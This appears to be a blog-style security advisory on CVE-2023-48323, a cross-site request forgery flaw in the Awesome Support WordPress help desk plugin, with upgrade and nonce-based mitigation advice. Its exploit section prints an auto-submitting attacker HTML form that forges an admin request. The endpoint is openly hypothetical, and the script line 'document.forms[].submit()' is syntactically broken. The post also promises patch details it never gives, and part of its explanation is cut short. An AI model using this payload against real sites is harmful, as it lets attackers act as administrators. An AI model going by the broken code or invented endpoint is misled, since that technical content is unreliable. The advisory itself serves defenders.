CVE-2023-48323 - Cross-Site Request Forgery in Awesome Support – WordPress HelpDesk & Support Plugin

In late 2023, a security flaw was found in the popular WordPress plugin, Awesome Support – WordPress HelpDesk & Support Plugin. Labeled CVE-2023-48323, this vulnerability allows hackers to perform Cross-Site Request Forgery (CSRF) attacks, potentially letting malicious users manipulate help desk settings or perform unwanted actions on behalf of logged-in administrators. This post explains the vulnerability in simple terms, provides a code snippet example, links to key references, and details how an attacker could exploit this issue.

What is CSRF?

Cross-Site Request Forgery (CSRF) is a web security vulnerability that tricks logged-in users into submitting unwanted actions to a web application. If a user is authenticated, an attacker can get them to perform bad actions—like changing support settings or adding tickets—just by visiting a rogue website or clicking a malicious link.

To put it simply, CSRF takes advantage of the website trusting that the user is actually making the request, when in reality, it could be a hacker on another site making those requests.

Versions: Unknown start version up to (and including) 6.1.4

> If you use this plugin, upgrade to a version newer than 6.1.4 as soon as possible!

Technical Explanation

The vulnerability lies in the fact that some admin actions in the plugin did not check for a CSRF protection token (nonce). This means that if an admin user visited a malicious website while logged in to their WordPress dashboard, the attacker could send forged requests to the plugin.

Exploit Example

Let’s say the plugin lets admins add a canned response without checking for a WordPress nonce. Here’s a simple HTML page (hosted by an attacker) that exploits this:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wpas-canned-responses&action=add"; method="POST">
      <input type="hidden" name="title" value="Hacked!" />
      <input type="hidden" name="content" value="You have been CSRF'd!" />
      <input type="submit" value="Click me!" />
    </form>
    <script>
      // Auto-submit the form when the page loads
      document.forms[].submit();
    </script>
  </body>
</html>

How it works:
- If an admin user visits this page while logged into their WordPress dashboard, it will automatically submit the form.

Possibly open the door for further attacks (like injecting content or links for phishing).

All of this could happen without the admin knowing, just by visiting a malicious site, clicking a dodgy link, or opening a malicious email!

Fix & Mitigation

Fixed in version: _A version after 6.1.4 (patch details below)_

The proper fix is to implement WordPress nonces (special tokens) for all form actions and verify them server-side before processing changes.

References

- Wordfence Advisory - CSRF in Awesome Support
- CVE-2023-48323 on CVE.org
- Plugin homepage on WordPress.org
- OWASP: CSRF Explained

Always update your plugins and stay aware of security advisories.

If you’re a site owner using Awesome Support, patch now and protect your users and their tickets!


> Stay safe, stay updated, and if you manage a WordPress site, always keep back-ups of plugins and your data!


*This article was written exclusively for security-focused site owners and WordPress admins. Please spread the word and help keep the web secure.*

Timeline

Published on: 11/30/2023 13:15:09 UTC
Last modified on: 12/05/2023 02:00:16 UTC